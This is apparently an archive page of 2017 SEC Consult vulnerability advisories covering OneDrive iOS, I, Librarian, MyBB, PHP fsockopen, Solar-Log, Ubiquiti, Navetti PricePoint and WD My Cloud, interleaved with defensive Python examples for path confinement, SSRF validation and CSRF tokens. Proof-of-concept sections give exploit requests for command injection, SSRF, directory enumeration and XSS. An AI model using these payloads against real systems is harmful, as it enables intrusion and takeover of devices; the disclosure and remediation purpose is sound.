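        return "in_app"  # relative link: stays inside the document
    if scheme in IN_APP_SCHEMES:
        return "in_app"
    if scheme in CONFIRM_SCHEMES:
        return "confirm"
    return "block"  # unknown or custom scheme: never auto-dispatched


def open_link(href: str, user_confirmed: bool) -> bool:
    """Decide whether the link may be dispatched. A synthetic click such as the
    dispatchEvent() call in the proof of concept never carries a real
    confirmation, so a 'confirm' link is dispatched only after a prompt."""
    verdict = classify_link(href)
    if verdict == "in_app":
        return True
    if verdict == "confirm":
        return user_confirmed
    return False
```

The important property is that `user_confirmed` comes from a native prompt
shown by the app, not from anything the page's own script can trigger.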


Vulnerable / tested versions:
-
The following version is affected by the identified vulnerability which
was the most recent version at the time of discovery:

Microsoft OneDrive iOS application v8.13


Vendor contact timeline:

2017-04-11: Contacting vendor through sec...@microsoft.com
2017-04-12: Vendor confirmed the vulnerability.
2017-04-21: Vendor released the updated version.
2017-05-10: Public release of advisory.


Solution:
-
SEC Consult recommends implementing proper validation of URI schemes and
always asking for user permission before calling a URI scheme.

Update to OneDrive v8.14
https://itunes.apple.com/us/app/microsoft-onedrive-file-photo-cloud-storage/id477537958?mt=8


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Siddhartha Tripathy / @2017





SEC Consult SA-20170509-0 :: Multiple vulnerabilities in I, Librarian PDF manager

2017-05-09 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 >
===
  title: Multiple vulnerabilities
product: I, Librarian PDF manager
 vulnerable version: <=4.6 & 4.7
  fixed version: 4.8
 CVE number: -
 impact: Critical
   homepage: https://i-librarian.net/
  found: 2017-01-30
 by: Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"I, Librarian is a PDF manager or PDF organizer, which enables researchers,
scholars, or students to create an annotated collection of PDF articles. If
used as a groupware, users may build their virtual library collaboratively,
sharing the workload of literature mining. I, Librarian will make your work
with scientific literature incredibly efficient."

Source: https://i-librarian.net/


Business recommendation:

By combining the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server on which the "I, Librarian" software is
installed.

SEC Consult recommends installing the latest version available immediately and
performing a thorough security review of this software.


Vulnerability overview/description:
---
The application doesn't apply proper validation to some user inputs. As a
result, the vulnerabilities below can be exploited by authenticated attackers
with any role to fully compromise the system.

1. OS Command Injection
Arbitrary OS commands can be executed via "batchimport.php". This is a serious
vulnerability, as the chances for the web server to be fully compromised are
very high.

2. Server-Side Request Forgery
This vulnerability allows an attacker to send HTTP requests originating from the
web server. As some functions in the web application require requests to
be done from localhost, the risk for this vulnerability is considered high.

3. Directory Enumeration
It is possible to enumerate all subdirectories of any directory on the server
through "jqueryFileTree.php".

4. Reflected Cross Site Scripting
This vulnerability was found in "temp.php". It allows an attacker to inject
malicious client side scripting which will be executed in the browser of users
if they visit the manipulated site.


Proof of concept:
-
1. OS Command Injection
Below are the details of the HTTP request that needs to be sent to execute
arbitrary OS commands through "batchimport.php":

URL : http://$DOMAIN/batchimport.php
METHOD  : GET
PAYLOAD : directory=.==""


2. Server-Side Request Forgery
Below shows an example of the exploitation for this vulnerability. An attacker
can reset any user's password which by design requires the request to be sent
from localhost.

URL : http://$DOMAIN/ajaxsupplement.php
METHOD  : POST
PAYLOAD :
form_new_file_link=http://$DOMAIN/resetpassword.php?username=_password1=_password2=


3. Directory Enumeration
Available directories can be enumerated simply by navigating through the "dir"
parameter in "jqueryFileTree.php".

URL : http://$DOMAIN/jqueryFileTree.php
METHOD  : POST
PAYLOAD : dir=
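
Issues 1 and 3 share a root cause: a request parameter naming a directory is
used unconfined, once on a shell command line and once in a listing. The
following added example (not I, Librarian code) shows the handling for both:
the value is resolved inside a configured base directory and refused if it
escapes, and any external tool is invoked with an argument list rather than a
shell string, so metacharacters in the value are never interpreted. The base
directory layout is constructed, and `echo` stands in for the real importer.

```python
import os
import subprocess
import tempfile
from pathlib import Path

# Added example: path confinement plus shell-free tool invocation.


class BadPathError(ValueError):
    pass


def confine_to_base(base: str, requested: str) -> Path:
    """Resolve `requested` relative to `base`; refuse anything that escapes it."""
    base_real = Path(base).resolve()
    # Treat the value as relative even if it starts with "/" or "\", and
    # resolve symlinks and ".." before comparing against the base.
    candidate = (base_real / requested.lstrip("/\\")).resolve()
    try:
        candidate.relative_to(base_real)
    except ValueError:
        raise BadPathError("path escapes the library directory") from None
    if not candidate.is_dir():
        raise BadPathError("not a directory")
    return candidate


def list_subdirectories(base: str, requested: str) -> list:
    """Safe replacement for a file-tree endpoint: names only, inside `base`."""
    directory = confine_to_base(base, requested)
    return sorted(p.name for p in directory.iterdir() if p.is_dir())


def run_import_tool(base: str, requested: str, tool: str = "echo") -> str:
    """Invoke a converter on a confined directory without a shell.

    `tool` defaults to `echo` so the example runs anywhere; a deployment would
    name its PDF importer here. With an argument list and no shell=True, the
    path is a single argv element and is never re-parsed for ; | $ and the like.
    """
    directory = confine_to_base(base, requested)
    result = subprocess.run([tool, str(directory)], capture_output=True, text=True, check=True)
    return result.stdout.strip()


def make_demo_library() -> str:
    """Create a throwaway library layout (constructed for this example)."""
    base = tempfile.mkdtemp(prefix="ilib-demo-")
    for name in ("papers", "notes", "odd; name"):
        os.mkdir(os.path.join(base, name))
    with open(os.path.join(base, "index.txt"), "w") as fh:
        fh.write("not a directory\n")
    return base
```

The directory named "odd; name" in the demo layout is the point of the
argument-list call: the tool receives that name verbatim, where a shell
command line would have executed "name" as a separate command.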


4. Reflected Cross Site Scripting
The following payload shows a simple alert message box:
URL : http://$DOMAIN/temp.php
METHOD  : GET
PAYLOAD : tempfile=alert(42)


Vulnerable / tested versions:
-
"I, Librarian" version 4.6 has been tested. This version was the latest
at the time the security vulnerabilities were discovered. It is assumed
that previous versions are affected as well.


Vendor contact timeline:

2017-01-31: Contacting vendor through supp...@i-librarian.net
2017-01-31: Vendor replied with their PGP public key.
2017-02-03: Provided encrypted advisory and proof of concept to the vendor.
2017-02-09: Patch released, version 4.7.
2017-02-21: Informed vendor on some issues which were not addressed correctly.
2017-03-30: Patch released by the vendor - I, Librarian version 4.8.
2017-05-09: Public release of advisory


Solution:
-
Upgrade to I, Librarian 4.8

For further information see:
https://i-librarian.net/article.php?id=9


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~

SEC Consult SA-20170407-0 :: Server-Side Request Forgery in MyBB forum

2017-04-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170407-0 >
===
  title: Server Side Request Forgery (SSRF) Vulnerability
product: MyBB
 vulnerable version: 1.8.10
  fixed version: 1.8.11
 CVE number: CVE-2017-7566
 impact: Medium
   homepage: https://mybb.com/
  found: 2017-03-03
 by: Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"With everything from forums to threads, posts to private messages, search to
profiles, and reputation to warnings, MyBB features everything you need to run
an efficient and captivating community. Through plugins and themes, you can
extend MyBB's functionality to build your community exactly as you'd like it."

Source: https://mybb.com/


Business recommendation:

The patch should be installed immediately if cURL functions are disabled.

Furthermore, SEC Consult recommends performing a thorough security review of
this software.


Vulnerability overview/description:
---
1. Server-Side Request Forgery
An attacker is able to initiate socket connections with arbitrary systems using
the internal network interface of the server via the web application's "Change
Avatar" function. This vulnerability can be used to identify internal hosts and
perform internal port scanning.


Proof of concept:
-
1. Server-Side Request Forgery
This vulnerability can be exploited by an attacker with an ordinary registered
account. If the server hosting the web application disallows cURL functions,
the application falls back to the "fsockopen" function. Below is an example of
how the SSRF issue can be exploited.

URL : http://$DOMAIN/usercp.php
METHOD  : POST
PAYLOAD : avatarurl=http://$IP:$PORT:80


Vulnerable / tested versions:
-
MyBB version 1.8.10 has been tested. This version was the latest version
at the time the security vulnerability was discovered.


Vendor contact timeline:

2017-03-09: Contacting vendor through the "Private Inquiries" forum at
https://community.mybb.com/forum-135.html
2017-03-09: Advisory sent through the "Private Inquiries". Vendor has
confirmed the issues. No specific date on the fix was given
2017-03-17: Vendor confirmed the vulnerability; working on the fix
2017-03-31: Requesting a status update.
2017-04-04: Patch released by the vendor.
2017-04-07: Public release of advisory.


Solution:
-
Upgrade to MyBB 1.8.11

For further information see:
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~


EOF Fikri Fadzil / @2017





SEC Consult SA-20170403-0 :: Misbehavior of PHP fsockopen function

2017-04-03 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170403-0 >
===
  title: Misbehavior of the "fsockopen" function
product: PHP
 vulnerable version: 7.1.2
  fixed version:
 CVE number: CVE-2017-7272
 impact: Medium
   homepage: http://www.php.net/
  found: 2017-03-06
 by: Fikri Fadzil (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"PHP is a popular general-purpose scripting language that is especially suited
to web development. Fast, flexible and pragmatic, PHP powers everything from
your blog to the most popular websites in the world."

Source: http://www.php.net/


Business recommendation:

By making use of this issue, it is possible for an attacker to bypass current
prevention mechanisms used to protect the "fsockopen" function in PHP and to
perform server-side request forgery attacks.

SEC Consult recommends checking developed or installed websites for any
possibility to exploit this issue.


Vulnerability overview/description:
---
The "fsockopen" function in PHP will respond differently if two port numbers
are given at once. As many developers assume the function will prioritize the
port number given to the second function parameter, an attacker may utilize this
unpredictable behavior to e.g. conduct a server-side request forgery attack.


Proof of concept:
-
The "fsockopen" function in PHP will not use the port number given to the
second parameter if the hostname already has a port number appended. The
example below illustrates the misbehavior of the function.

// This request will go to port 80
fsockopen("192.168.184.132", 80);

// This request will go to port 53
fsockopen("192.168.184.132:53", 80);

Instead of initiating a socket connection on port 80 as given in the second
parameter, the function appears to use the port number 53 which is
appended to the hostname.



Vulnerable / tested versions:
-
PHP version 7.0.11 and 7.1.2 have been tested and found to be vulnerable.

Older PHP versions are potentially affected as well.


Vendor contact timeline:

2017-03-07: Reported the issue through PHP Bug Tracking System. (SecBug #74216)
https://bugs.php.net/bug.php?id=74216
2017-03-07: Changes were committed to the PHP's main repo in Github.

https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a
2017-04-03: Public disclosure of the advisory


Solution:
-
Patch:
https://github.com/php/php-src/commit/bab0b99f376dac9170ac81382a5ed526938d595a


Workaround:
---
It is recommended to restrict user input data for a hostname to not have a
port number appended.
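
The workaround above, together with the two SSRF findings in the I, Librarian
and MyBB advisories, comes down to one validator for user-supplied outbound
targets. The following is an added example, not PHP, MyBB or I, Librarian
code: the host is accepted only as a bare DNS name or IP literal with no
embedded ":port", so it cannot override the port the application chose; a port
in the URL is accepted only if it equals the application's port; and every
address the name resolves to must be globally routable, so the server cannot be
steered at itself or its internal network. The resolver is a parameter, and the
lookup table is constructed so the example runs offline; function names are
assumptions.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

# Added example: validating a user-supplied outbound target before connecting.
_LABEL = r"(?!-)[a-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)" + _LABEL + r"(\." + _LABEL + r")*$")


class UnsafeTargetError(ValueError):
    pass


def validate_hostname(host: str) -> str:
    """Return the normalised host, or raise if it is not a bare name or IP literal."""
    host = host.strip().lower().rstrip(".")
    if not host:
        raise UnsafeTargetError("empty host")
    try:
        ipaddress.ip_address(host)
        return host  # bare IP literal, no port, no brackets
    except ValueError:
        pass
    if not _HOSTNAME_RE.match(host):
        # Rejects "host:53", userinfo, brackets, spaces, underscores and the like.
        raise UnsafeTargetError("host is not a plain DNS name or IP literal: %r" % host)
    return host


def _is_public(ip) -> bool:
    # is_global excludes private, loopback, link-local, reserved and
    # documentation ranges; multicast is excluded separately.
    return ip.is_global and not ip.is_multicast


def system_resolver(host: str) -> list:
    """Production resolver: every address the name maps to, v4 and v6."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_outbound_target(url: str, port: int, resolver=system_resolver) -> tuple:
    """Return (host, port, addresses) that are safe to connect to, or raise.

    `port` is chosen by the application; a port in the URL is accepted only
    when it is the same, so the user cannot redirect the request elsewhere.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):
        raise UnsafeTargetError("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise UnsafeTargetError("userinfo not allowed")
    try:
        url_port = parts.port  # raises ValueError on "host:53:80"-style junk
    except ValueError:
        raise UnsafeTargetError("malformed port in URL") from None
    if url_port is not None and url_port != port:
        raise UnsafeTargetError("URL port %d does not match application port %d" % (url_port, port))
    host = validate_hostname(parts.hostname or "")
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        addresses = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addresses:
        raise UnsafeTargetError("host does not resolve")
    for ip in addresses:
        if not _is_public(ip):
            raise UnsafeTargetError("%s resolves to non-public address %s" % (host, ip))
    return host, port, [str(ip) for ip in addresses]


# Constructed lookup table so the example runs offline (not real DNS data;
# the public addresses are sample values chosen only for being globally routable).
DEMO_DNS = {
    "avatars.example": ["93.184.216.34"],
    "intranet.example": ["10.0.0.5"],
    "dual.example": ["93.184.216.34", "192.168.1.9"],
}


def demo_resolver(host: str) -> list:
    return DEMO_DNS.get(host, [])
```

Connect to one of the returned addresses rather than re-resolving the name, so
a record that changes between validation and connection (DNS rebinding) cannot
undo the check.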


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~


EOF Fikri Fadzil / @2017





SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

2017-03-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
===
  title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
 Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
  fixed version: Firmware 3.5.3-86
 CVE number: -
 impact: Critical
   homepage: http://www.solar-log.com/de/home.html
  found: 2017-01-23
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html


Business recommendation:

SEC Consult recommends immediately installing the available firmware update
and restricting network access to the device.

Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.

An attacker can download the configuration file without authentication and
extract the password used to log in to the Solar-Log. An attacker can therefore
gain administrative access to such a device without prior authentication.


2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.

A CSRF vulnerability enables an attacker to remove or modify the password of a
device by luring an authenticated user into clicking a crafted link. An attacker
can take over the device by exploiting this vulnerability.


3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.

Arbitrary files can be uploaded to the Solar-Log using a crafted POST request.
An attacker can host a malicious website on it or use the Solar-Log as a file
share to store arbitrary (illegal) content.


4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)

The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.

All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.


5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

Since the Solar-Log is based on Beck IPC chips, a UDP configuration server is
enabled by default. This server allows the IP configuration to be changed over a
specific UDP port. The functionality can be protected with a password, but no
password is set in the affected firmware versions.

The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.


6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

The Beck IPC UDP configuration server on Solar-Log devices can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.


7) Potential Unauthenticated Reprogramming of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)

Since the "CHIPTOOL" from Beck IPC enables a developer to reprogram the chip
over the network via UDP, the missing password can also enable an attacker to do
this on a Solar-Log device. This could lead to a simple denial of service or to
a complex botnet of Solar-Log devices.


Proof of concept:

SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products

2017-03-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170316-0 >
===
  title: Authenticated Command Injection
product: Multiple Ubiquiti Networks products, e.g.
 TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
 AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
 AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
 BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
 locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
 NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
 NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
 Power AP N
 vulnerable version: v1.3.3 (SW), v5.6.9/v6.0 (XM)
  fixed version: -
 CVE number: -
 impact: Critical
   homepage: https://www.ubnt.com
  found: 2016-11-22
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Command Injection in Admin Interface
A command injection vulnerability was found in "pingtest_action.cgi".
This script is vulnerable because an attacker can inject the value of a
request variable. One reason for this behaviour is the PHP version in use
(PHP/FI 2.0.1 from 1997).

The vulnerability can be exploited by luring a victim into clicking a crafted
link or simply visiting a malicious website. The whole attack can be performed
via a single GET request and is very simple, since there is no CSRF protection.
See our other advisory published in January 2017:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170130-0_Ubiquiti_Networks_XSS_CSRF_v10.txt

An attacker can open a bind shell or a reverse shell on the device and is also
able to change the "passwd" file, since the web service runs with root
privileges.

Furthermore, low privileged read-only users, who can be created in the web
interface, are also able to perform this attack.

If the Ubiquiti device acts as a router or even as a firewall, the attacker
can take over the whole network by exploiting this vulnerability.


Proof of concept:
-
1) Command Injection in Admin Interface
The following link can be used to open a reverse shell to the attacker's
IP address. There are two possibilities for the different firmware
versions.
Reverse root shell - firmware: v1.3.3 (SW)
[ PoC removed - no patch available ]

Reverse root shell - firmware: v5.6.9/v6.0 (XM)
[ PoC removed - no patch available ]

A video is available here: https://youtu.be/oU8GNeP_Aps


Vulnerable / tested versions:
-
The following devices and firmware versions have been tested/verified:
TS-8-PRO - v1.3.3 (SW)
(Rocket) M5  - v5.6.9/v6.0 (XM)
(PicoStationM2HP) PICOM2HP   - v5.6.9/v6.0 (XM)
(NanoStationM5) NSM5 - v5.6.9/v6.0 (XM)

Based on information embedded in the firmware of other Ubiquiti products
gathered from our IoT Inspector tool we believe the following devices are
affected as well:

Ubiquiti Networks AF24 (Version: AF24 v3.2)
Ubiquiti Networks AF24HD (Version: AF24 v3.2)
Ubiquiti Networks AF-2X (Version: AF2X v3.2 )
Ubiquiti Networks AF-3X (Version: AF3X v3.2)
Ubiquiti Networks AF5 (Version: AF5 v3.2)
Ubiquiti Networks AF5U (Version: AF5 v3.2)
Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)
Ubiquiti Networks AG-PRO-INS (Version: AirGWP v1.1.7)
Ubiquiti Networks airGateway (Version: AirGW v1.1.7)
Ubiquiti Networks airGateway-LR (Version: AirGW v1.1.7)
Ubiquiti Networks AMG-PRO (Version: AirGWP v1.1.7)
Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)
Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)
Ubiquiti Networks LBE-M5-23 (Version: XW v5.6.9/v6.0)
Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)
Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)
Ubiquiti Networks NBE-M2-13 (Version: XW v5.6

SEC Consult SA-20170308-0 :: Multiple vulnerabilities in Navetti PricePoint

2017-03-08 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
===
  title: Multiple vulnerabilities
product: Navetti PricePoint
 vulnerable version: 4.6.0.0
  fixed version: 4.7.0.0 or higher
 CVE number: -
 impact: high/critical
   homepage: http://www.navetti.com/
  found: 2016-07-18
 by: W. Schober (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Navetti PricePoint is the ultimate business tool for controlling, managing and
measuring all aspects of your pricing. Our clients have been able to increase
their revenue and profitability substantially, implement market- and value-based
pricing, increase customer trust and implement a common business language
throughout their organization. In addition, with Navetti PricePoint our clients
are able to implement governance processes, manage risk and ensure organization
compliance, and attain business sustainability."

Source:
http://www.navetti.com/our-expertise/navetti-pricepoint/


Business recommendation:

During a quick security check, SEC Consult identified four vulnerabilities,
some of which are critical. As the time frame of the test was limited, it is
suspected that there are more vulnerabilities in the application.

SEC Consult highly recommends applying the patch that resolves the identified
vulnerabilities before using Navetti PricePoint in an environment with
potential attackers.


Vulnerability overview/description:
---
1) SQL Injection (Blind boolean based)
Navetti PricePoint is prone to SQL injection attacks. The attacks can be
executed by users of any privilege level, from the lowest privileged users to
the highest privileged users.

By exploiting this vulnerability, an attacker gains access to all records
stored in the database with the privileges of the database user.

2) Multiple persistent cross site scripting vulnerabilities
The web application suffers from multiple persistent cross site scripting
issues.
Low privileged users as well as high privileged users are able to inject
malicious JavaScript payloads persistently into the application. This
vulnerability is even more critical because it can be used by a low privileged
user who wants to elevate his privileges. The low privileged attacker can
place a payload which creates a new superuser, or adds his own account to the
superuser group. If a superuser logs in to the application, the JavaScript
payload is executed with the rights of the superuser and the new user is
created or added to the superuser group.

3) Multiple reflected cross site scripting vulnerabilities
Navetti PricePoint suffers from multiple reflected cross site scripting issues.
The code which is used to generate error messages inside the application does
not correctly escape/sanitize user input. As a result, all error messages
containing user input are prone to reflected cross site scripting attacks.
Furthermore, the file upload dialog does not correctly sanitize the file name of
uploaded files. If a file name contains a JavaScript payload, it is executed in
the file upload dialog.

4) Cross Site Request Forgery
Navetti PricePoint doesn't implement any kind of cross site request forgery
protection. Attackers are able to execute arbitrary requests with the privileges
of any user. The only requirement is that the victim clicks on a malicious
link. For example, an administrator can be forced to execute unwanted actions.
Some of these actions are:

  -) Add users
  -) Delete users
  -) Add users to an arbitrary role
  -) Change internal settings of the application
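
The protection the advisory says is missing is the synchronizer token pattern: a
state-changing endpoint only accepts POST requests that carry a token bound to the
victim's session, which a page on another origin cannot read. The block below is an
added example (not Navetti code, and not from any of the other CSRF findings on this
page, which it equally applies to); the request/session dictionaries, the endpoint
name, the allowed origin and the key handling are assumptions for illustration:

```python
import hashlib
import hmac
import secrets

# Constructed for this example; a real application loads the key from configuration
# and never regenerates it per process, or sessions cannot verify their tokens.
SECRET_KEY = secrets.token_bytes(32)
ALLOWED_ORIGINS = {"https://pricepoint.example"}   # constructed origin


def issue_csrf_token(session_id: str) -> str:
    """Random nonce bound to the session by an HMAC, so no server-side store is needed."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_add_user(request: dict, session: dict) -> tuple:
    """Hypothetical 'add user' endpoint. request = {"method", "headers", "form"}."""
    if request.get("method") != "POST":
        return 405, "method not allowed"            # never change state on GET
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return 403, "cross-origin request rejected"  # defence in depth, browser-supplied
    form = request.get("form", {})
    # The session cookie alone proves nothing: a forged cross-site request carries it too.
    if not verify_csrf_token(session["id"], form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, f"user {form['username']} created"
```

The token is embedded in the legitimate form (or sent as a request header by the
application's own scripts); a crafted link or auto-submitting form on an attacker's
site has no way to obtain it, so the forged request fails the check regardless of
whether the victim is logged in.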


Proof of concept:
-
1) SQL Injection (Blind boolean based)
The search function in the tree structure, which displays various groups, does
not properly validate user input, allowing an attacker with any privilege level
to inject arbitrary SQL commands and read the contents of the whole database.

The following URL could be used to perform blind SQL injection attacks:
-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
  (Parameter: searchString, Type: GET)

2) Multiple persistent cross site scripting vulnerabilities
The following URL parameters have been identified to be vulnerable against
persistent cross site scripting:

-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Para

SEC Consult SA-20170307-0 :: Unauthenticated OS command injection & arbitrary file upload in Western Digital WD My Cloud

2017-03-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170307-0 >
===
  title: Unauthenticated OS command injection & arbitrary file upload
product: Western Digital My Cloud
 vulnerable version: at least: 2.21.126 (My Cloud), 2.11.157(My Cloud EX2),
 2.21.126 (My Cloud EX2 Ultra), 2.11.157 (My Cloud EX4),
 2.21.126 (My Cloud EX2100), 2.21.126 (My Cloud EX4100),
 2.11.157 (My Cloud Mirror), 2.21.126 (My Cloud Mirror
 Gen2), 2.21.126 (My Cloud PR2100), 2.21.126 (My Cloud
 PR4100), 2.21.126 (My Cloud DL2100), 2.21.126 (My Cloud
 DL4100)
  fixed version: -
 CVE number: -
 impact: Critical
   homepage: https://www.wdc.com/en-um/
  found: 2017-01-17
 by: Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Reliable, centralized personal storage with automatic backup that plugs into
your own home network. Share whatever you want, anywhere you have an Internet
connection."

Source: https://www.wdc.com/products/personal-cloud-storage/my-cloud.html


Business recommendation:

By combining the vulnerabilities documented in this advisory an attacker
can fully compromise a WD My Cloud device. In the worst case one could steal
sensitive data stored on the device or use it as a jump host for further
internal attacks.

SEC Consult recommends not to attach WD My Cloud to the network until
a thorough security review has been performed by security professionals and
all identified issues have been resolved.


Vulnerability overview/description:
---
The firmware doesn't apply proper validation to many user inputs. As a
result, the following vulnerabilities can be exploited by unauthenticated
attackers to fully compromise the device.

1. Unauthenticated OS Command Injection
Arbitrary OS commands can be injected by unauthenticated attackers. This is a
